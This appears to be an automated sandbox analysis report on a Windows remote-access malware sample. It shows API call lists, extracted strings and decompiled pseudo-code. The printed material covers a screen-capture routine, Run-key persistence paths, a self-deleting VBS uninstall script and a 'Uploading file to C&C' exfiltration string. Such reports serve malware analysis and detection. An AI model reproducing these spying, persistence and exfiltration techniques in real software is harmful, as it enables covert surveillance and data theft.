                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 004084FC
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408504
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 0040851B
                                                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408528
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408534
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 0040853D
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408546
                                                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 00408554
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408560
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040856A
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408576
                                                                                  • Part of subcall function 00412D56: CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 0040858F
                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040859C
                                                                                • exit.MSVCRT ref: 004085A3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@G@2@@0@V?$basic_string@$Hstd@@$V01@V10@Y?$basic_string@$??0?$basic_string@D@2@@std@@D@std@@FileG@1@@$TerminateV01@@V10@@$??9std@@AttributesThread$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                                                                • String ID: ")$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\uninstall.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                                                                • API String ID: 4026913539-546584676
                                                                                • Opcode ID: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                                                                • Instruction ID: 4759749fa9a93480e8798f104ff06792d31013b0e42c9834499dc68fb1b0d0e4
                                                                                • Opcode Fuzzy Hash: c0431d19fb75d3accf122d956e21a0eee54d605bc0c6247b88d50a3a2d2e7deb
                                                                                • Instruction Fuzzy Hash: FA917172900509BBDB00EBE0ED4DAEE777CEF94305F14806AF902A2191DF795E44CBA9
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040FA46, Relevance: 91.3, APIs: 49, Strings: 3, Instructions: 318windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 62%
                                                                                			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v44;
				intOrPtr _v50;
				void* _v52;
				void* _v54;
				intOrPtr _v58;
				char _v60;
				char _v76;
				intOrPtr _v80;
				struct tagCURSORINFO _v96;
				signed int _v102;
				signed int _v104;
				long _v112;
				long _v116;
				char _v120;
				struct _ICONINFO _v140;
				int _t143;
				void* _t144;
				signed int _t153;
				long _t164;
				void* _t165;
				char* _t189;
				signed int _t193;
				void* _t214;
				signed int _t222;
				signed char _t224;
				signed int _t225;
				signed int _t242;
				struct HDC__* _t245;
				int _t249;
				struct tagBITMAPINFO* _t250;

				_t214 = 0;
				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
				_v16 = _t245;
				_v8 = CreateCompatibleDC(_t245);
				_t248 = 0x41bfc8 + _a12 * 4;
				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
				_v28 = _t143;
				if(_v12 != 0 || _t143 != 0) {
					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
					_a12 = _t144;
					if(_t144 != _t214) {
						if(SelectObject(_v8, _t144) != 0) {
							_v24 = _t214;
							asm("stosd");
							E0040FF57( *_t248,  &_v24);
							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
								if(_a8 != 0) {
									_v96.cbSize = 0x14;
									if(GetCursorInfo( &_v96) != 0 && GetIconInfo(_v96.hCursor,  &_v140) != 0) {
										DeleteObject(_v140.hbmColor);
										DeleteObject(_v140.hbmMask);
										DrawIcon(_v8, _v96.ptScreenPos - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v96.hCursor);
										_t214 = 0;
									}
								}
								_push( &_v120);
								_t249 = 0x18;
								if(GetObjectA(_a12, _t249, ??) != 0) {
									_t153 = _v102 * _v104;
									_t242 = 1;
									if(_t153 != _t242) {
										_t222 = 4;
										if(_t153 > _t222) {
											_t222 = 8;
											if(_t153 <= _t222) {
												goto L18;
											}
											_t222 = 0x10;
											if(_t153 <= _t222) {
												goto L18;
											}
											if(_t153 > _t249) {
												_a8 = 0x20;
												L28:
												_push(0x28 + (_t242 << _a8) * 4);
												L23:
												_t250 = LocalAlloc(0x40, ??);
												_t224 = _a8;
												_t250->bmiHeader = 0x28;
												_t250->bmiHeader.biWidth = _v116;
												_t250->bmiHeader.biHeight = _v112;
												_t250->bmiHeader.biPlanes = _v104;
												_t250->bmiHeader.biBitCount = _v102;
												if(_t224 < 0x18) {
													_t193 = 1;
													_t250->bmiHeader.biClrUsed = _t193 << _t224;
												}
												_t225 = 8;
												asm("cdq");
												_t250->bmiHeader.biCompression = _t214;
												_t250->bmiHeader.biClrImportant = _t214;
												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
												_t250->bmiHeader.biSizeImage = _t164;
												_t165 = GlobalAlloc(_t214, _t164);
												_v12 = _t165;
												if(_t165 != _t214) {
													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
														_v60 = 0x4d42;
														_v54 = _t214;
														_v52 = _t214;
														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														DeleteObject(_a12);
														GlobalFree(_v12);
														DeleteDC(_v16);
														DeleteDC(_v8);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														goto L33;
													}
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													GlobalFree(_v12);
													_t189 =  &_a11;
												} else {
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													_t189 =  &_a11;
												}
												goto L31;
											}
											_a8 = _t249;
											_push(0x28);
											goto L23;
										}
										L18:
										_a8 = _t222;
										goto L28;
									}
									_a8 = _t242;
									goto L28;
								} else {
									DeleteDC(_v16);
									DeleteDC(_v8);
									DeleteObject(_a12);
									_t189 =  &_a11;
									goto L31;
								}
							}
							DeleteDC(_v16);
							DeleteDC(_v8);
							DeleteObject(_a12);
							_t189 =  &_a11;
							goto L31;
						}
						DeleteDC(_t245);
						DeleteDC(_v8);
						DeleteObject(_a12);
						_t189 =  &_a11;
						goto L31;
					}
					DeleteDC(_t245);
					DeleteDC(_v8);
					DeleteObject(_t214);
					_t189 =  &_a11;
					goto L31;
				} else {
					_t189 =  &_a11;
					L31:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
					L33:
					return _a4;
				}
			}







































                                                                                0x0040fa51
                                                                                0x0040fa62
                                                                                0x0040fa65
                                                                                0x0040fa6e
                                                                                0x0040fa7b
                                                                                0x0040fa89
                                                                                0x0040fa8c
                                                                                0x0040fa96
                                                                                0x0040fa99
                                                                                0x0040faac
                                                                                0x0040fab4
                                                                                0x0040fab7
                                                                                0x0040fae2
                                                                                0x0040fb08
                                                                                0x0040fb0b
                                                                                0x0040fb12
                                                                                0x0040fb40
                                                                                0x0040fb6d
                                                                                0x0040fb72
                                                                                0x0040fb82
                                                                                0x0040fbb0
                                                                                0x0040fbb5
                                                                                0x0040fbbf
                                                                                0x0040fbc5
                                                                                0x0040fbc5
                                                                                0x0040fb82
                                                                                0x0040fbca
                                                                                0x0040fbcd
                                                                                0x0040fbda
                                                                                0x0040fbfe
                                                                                0x0040fc02
                                                                                0x0040fc06
                                                                                0x0040fc12
                                                                                0x0040fc16
                                                                                0x0040fc22
                                                                                0x0040fc26
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc2a
                                                                                0x0040fc2e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040fc33
                                                                                0x0040fcc4
                                                                                0x0040fccb
                                                                                0x0040fcd7
                                                                                0x0040fc3e
                                                                                0x0040fc46
                                                                                0x0040fc48
                                                                                0x0040fc4f
                                                                                0x0040fc58
                                                                                0x0040fc5e
                                                                                0x0040fc65
                                                                                0x0040fc6d
                                                                                0x0040fc71
                                                                                0x0040fc75
                                                                                0x0040fc78
                                                                                0x0040fc78
                                                                                0x0040fc83
                                                                                0x0040fc84
                                                                                0x0040fc8b
                                                                                0x0040fc8e
                                                                                0x0040fc94
                                                                                0x0040fc9a
                                                                                0x0040fc9d
                                                                                0x0040fca5
                                                                                0x0040fca8
                                                                                0x0040fcf4
                                                                                0x0040fd2b
                                                                                0x0040fd3c
                                                                                0x0040fd40
                                                                                0x0040fd48
                                                                                0x0040fd57
                                                                                0x0040fd5e
                                                                                0x0040fd6b
                                                                                0x0040fd7a
                                                                                0x0040fd87
                                                                                0x0040fd93
                                                                                0x0040fda0
                                                                                0x0040fdaf
                                                                                0x0040fdbc
                                                                                0x0040fdc5
                                                                                0x0040fdca
                                                                                0x0040fdd9
                                                                                0x0040fdde
                                                                                0x0040fde7
                                                                                0x0040fdf0
                                                                                0x0040fdf9
                                                                                0x00000000
                                                                                0x0040fdf9
                                                                                0x0040fcff
                                                                                0x0040fd04
                                                                                0x0040fd09
                                                                                0x0040fd0e
                                                                                0x0040fd14
                                                                                0x0040fcaa
                                                                                0x0040fcb3
                                                                                0x0040fcb8
                                                                                0x0040fcbd
                                                                                0x0040fcbf
                                                                                0x0040fcbf
                                                                                0x00000000
                                                                                0x0040fca8
                                                                                0x0040fc39
                                                                                0x0040fc3c
                                                                                0x00000000
                                                                                0x0040fc3c
                                                                                0x0040fc18
                                                                                0x0040fc18
                                                                                0x00000000
                                                                                0x0040fc18
                                                                                0x0040fc08
                                                                                0x00000000
                                                                                0x0040fbdc
                                                                                0x0040fbe5
                                                                                0x0040fbea
                                                                                0x0040fbef
                                                                                0x0040fbf1
                                                                                0x00000000
                                                                                0x0040fbf1
                                                                                0x0040fbda
                                                                                0x0040fb4b
                                                                                0x0040fb50
                                                                                0x0040fb55
                                                                                0x0040fb5b
                                                                                0x00000000
                                                                                0x0040fb5b
                                                                                0x0040faeb
                                                                                0x0040faf0
                                                                                0x0040faf5
                                                                                0x0040fafb
                                                                                0x00000000
                                                                                0x0040fafb
                                                                                0x0040fac0
                                                                                0x0040fac5
                                                                                0x0040fac8
                                                                                0x0040face
                                                                                0x00000000
                                                                                0x0040fa9f
                                                                                0x0040fa9f
                                                                                0x0040fd17
                                                                                0x0040fd20
                                                                                0x0040fdff
                                                                                0x0040fe06
                                                                                0x0040fe06

                                                                                APIs
                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0040FA5C
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0040FA68
                                                                                  • Part of subcall function 0040FECE: GetMonitorInfoW.USER32(?,?), ref: 0040FEEE
                                                                                  • Part of subcall function 0040FF18: GetMonitorInfoW.USER32(0040FA91,?), ref: 0040FF38
                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 0040FAAC
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC0
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAC5
                                                                                • DeleteObject.GDI32(00000000), ref: 0040FAC8
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0040FADA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAEB
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FAF0
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FAF5
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040FD20
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD5E
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040FD6B
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00004D42,0000000E), ref: 0040FD7A
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FD87
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(00000000,00000028), ref: 0040FD93
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDA0
                                                                                • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,?), ref: 0040FDAF
                                                                                • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040FDBC
                                                                                • DeleteObject.GDI32(00410983), ref: 0040FDC5
                                                                                • GlobalFree.KERNEL32 ref: 0040FDCA
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDD9
                                                                                • DeleteDC.GDI32(00000000), ref: 0040FDDE
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040FDE7
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF0
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040FDF9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$Delete$??0?$basic_string@ObjectV01@@$?assign@?$basic_string@CreateD@1@@V01@V12@Y?$basic_string@$??1?$basic_string@CompatibleInfoMonitor$BitmapFreeGlobalSelect
                                                                                • String ID: $BM$DISPLAY
                                                                                • API String ID: 585525397-871886180
                                                                                • Opcode ID: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction ID: 6bc9ab2a81804b36ace2e86e9fd4fad5708e5c5067481f6dd5077a8177631ab2
                                                                                • Opcode Fuzzy Hash: 876bd925b7c2d7ba203db6ddd87036fd97f3491858af2704dd42dcb20a0039ab
                                                                                • Instruction Fuzzy Hash: 17C1E37190020DEFDF209FA0DC849DEBBB9FF48314F10843AE915A62A0D735AA59DF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403816, Relevance: 91.3, APIs: 50, Strings: 2, Instructions: 302fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                • CreateFileW.KERNEL32(0000FDE8,80000000,00000000,00000000,00000003,00000080,00000000,?,0041B310,00000000), ref: 00403845
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040385C
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • GetFileSize.KERNEL32(00000000,?,?,0041B310,00000000), ref: 0040387B
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 004038AA
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038C8
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Uploading file to C&C: ,00000000,?,?,?,?), ref: 004038D9
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004038EA
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004038F3
                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 00403940
                                                                                • SetFilePointer.KERNEL32(?,?,?,?), ref: 00403954
                                                                                • ReadFile.KERNEL32(?,?,0000FDE8,?,?), ref: 00403968
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0000FDE8,?), ref: 00403978
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?), ref: 0040398E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403B9B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BA4
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403BAD
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$File$G@2@@std@@G@std@@$D@1@@G@1@@V01@@$??2@CreateD@2@@0@Hstd@@PointerReadSizeV10@@V?$basic_string@
                                                                                • String ID: Uploading file to C&C: $[INFO]
                                                                                • API String ID: 18894167-3151135581
                                                                                • Opcode ID: ede4ef49983f38962c8be3cbc944f631a8af31d3ddf6f3e878268fb130776691
                                                                                • Instruction ID: b6d78ebecc7f0a5a63fa064e60f12d61dcf64d9c80a512a797ec440d8275d993
                                                                                • Opcode Fuzzy Hash: ede4ef49983f38962c8be3cbc944f631a8af31d3ddf6f3e878268fb130776691
                                                                                • Instruction Fuzzy Hash: B8C107B1C0010DEBDF05EFA1EC89DEEBB78EF54345F10806AF415A21A1EB755A89CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040FA46, Relevance: 89.6, APIs: 48, Strings: 3, Instructions: 318windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 59%
                                                                                			E0040FA46(void* __eflags, intOrPtr _a4, signed int _a8, char _a11, signed int _a12) {
				struct HDC__* _v8;
				void* _v12;
				struct HDC__* _v16;
				int _v20;
				int _v24;
				int _v28;
				char _v44;
				intOrPtr _v50;
				void* _v52;
				void* _v54;
				intOrPtr _v58;
				char _v60;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				struct HICON__* _v88;
				char _v96;
				signed int _v102;
				signed int _v104;
				long _v112;
				long _v116;
				char _v120;
				struct _ICONINFO _v140;
				int _t143;
				void* _t144;
				signed int _t153;
				long _t164;
				void* _t165;
				char* _t189;
				signed int _t193;
				void* _t214;
				signed int _t222;
				signed char _t224;
				signed int _t225;
				signed int _t242;
				struct HDC__* _t245;
				int _t249;
				struct tagBITMAPINFO* _t250;

				_t214 = 0;
				_t245 = CreateDCA("DISPLAY", 0, 0, 0);
				_v16 = _t245;
				_v8 = CreateCompatibleDC(_t245);
				_t248 = 0x41bfc8 + _a12 * 4;
				_v12 = E0040FECE( *((intOrPtr*)(0x41bfc8 + _a12 * 4)));
				_t143 = E0040FF18( *(0x41bfc8 + _a12 * 4));
				_v28 = _t143;
				if(_v12 != 0 || _t143 != 0) {
					_t144 = CreateCompatibleBitmap(_t245, _v12, _t143);
					_a12 = _t144;
					if(_t144 != _t214) {
						if(SelectObject(_v8, _t144) != 0) {
							_v24 = _t214;
							asm("stosd");
							E0040FF57( *_t248,  &_v24);
							if(StretchBlt(_v8, _t214, _t214, _v12, _v28, _v16, _v24, _v20, _v12, _v28, 0xcc0020) != 0) {
								if(_a8 != 0) {
									_v96 = 0x14;
									_push( &_v96);
									if( *0x41bf1c() != 0 && GetIconInfo(_v88,  &_v140) != 0) {
										DeleteObject(_v140.hbmColor);
										DeleteObject(_v140.hbmMask);
										DrawIcon(_v8, _v84 - _v140.xHotspot - _v24, _v80 - _v140.yHotspot - _v20, _v88);
										_t214 = 0;
									}
								}
								_push( &_v120);
								_t249 = 0x18;
								if(GetObjectA(_a12, _t249, ??) != 0) {
									_t153 = _v102 * _v104;
									_t242 = 1;
									if(_t153 != _t242) {
										_t222 = 4;
										if(_t153 > _t222) {
											_t222 = 8;
											if(_t153 <= _t222) {
												goto L18;
											}
											_t222 = 0x10;
											if(_t153 <= _t222) {
												goto L18;
											}
											if(_t153 > _t249) {
												_a8 = 0x20;
												L28:
												_push(0x28 + (_t242 << _a8) * 4);
												L23:
												_t250 = LocalAlloc(0x40, ??);
												_t224 = _a8;
												_t250->bmiHeader = 0x28;
												_t250->bmiHeader.biWidth = _v116;
												_t250->bmiHeader.biHeight = _v112;
												_t250->bmiHeader.biPlanes = _v104;
												_t250->bmiHeader.biBitCount = _v102;
												if(_t224 < 0x18) {
													_t193 = 1;
													_t250->bmiHeader.biClrUsed = _t193 << _t224;
												}
												_t225 = 8;
												asm("cdq");
												_t250->bmiHeader.biCompression = _t214;
												_t250->bmiHeader.biClrImportant = _t214;
												_t164 = (_t250->bmiHeader.biWidth + 7) / _t225 * (_a8 & 0x0000ffff) * _t250->bmiHeader.biHeight;
												_t250->bmiHeader.biSizeImage = _t164;
												_t165 = GlobalAlloc(_t214, _t164);
												_v12 = _t165;
												if(_t165 != _t214) {
													if(GetDIBits(_v8, _a12, _t214, _t250->bmiHeader.biHeight & 0x0000ffff, _t165, _t250, _t214) != 0) {
														_v60 = 0x4d42;
														_v54 = _t214;
														_v52 = _t214;
														_v58 = _t250->bmiHeader.biSizeImage + _t250->bmiHeader.biClrUsed * 4 + _t250->bmiHeader + 0xe;
														_v50 = _t250->bmiHeader + 0xe + _t250->bmiHeader.biClrUsed * 4;
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_a11);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z( &_v60, 0xe);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_t250, 0x28);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z(_v12, _t250->bmiHeader.biSizeImage);
														__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z( &_v44);
														DeleteObject(_a12);
														GlobalFree(_v12);
														DeleteDC(_v16);
														DeleteDC(_v8);
														__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z( &_v76);
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
														goto L33;
													}
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													GlobalFree(_v12);
													_t189 =  &_a11;
												} else {
													DeleteDC(_v16);
													DeleteDC(_v8);
													DeleteObject(_a12);
													_t189 =  &_a11;
												}
												goto L31;
											}
											_a8 = _t249;
											_push(0x28);
											goto L23;
										}
										L18:
										_a8 = _t222;
										goto L28;
									}
									_a8 = _t242;
									goto L28;
								} else {
									DeleteDC(_v16);
									DeleteDC(_v8);
									DeleteObject(_a12);
									_t189 =  &_a11;
									goto L31;
								}
							}
							DeleteDC(_v16);
							DeleteDC(_v8);
							DeleteObject(_a12);
							_t189 =  &_a11;
							goto L31;
						}
						DeleteDC(_t245);
						DeleteDC(_v8);
						DeleteObject(_a12);
						_t189 =  &_a11;
						goto L31;
					}
					DeleteDC(_t245);
					DeleteDC(_v8);
					DeleteObject(_t214);
					_t189 =  &_a11;
					goto L31;
				} else {
					_t189 =  &_a11;
					L31:
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(0x415664, _t189);
					L33:
					return _a4;
				}
			}









































                                                                                0x0040fa51
                                                                                0x0040fa62
                                                                                0x0040fa65
                                                                                0x0040fa6e
                                                                                0x0040fa7b
                                                                                0x0040fa89
                                                                                0x0040fa8c
                                                                                0x0040fa96
                                                                                0x0040fa99
                                                                                0x0040faac
                                                                                0x0040fab4
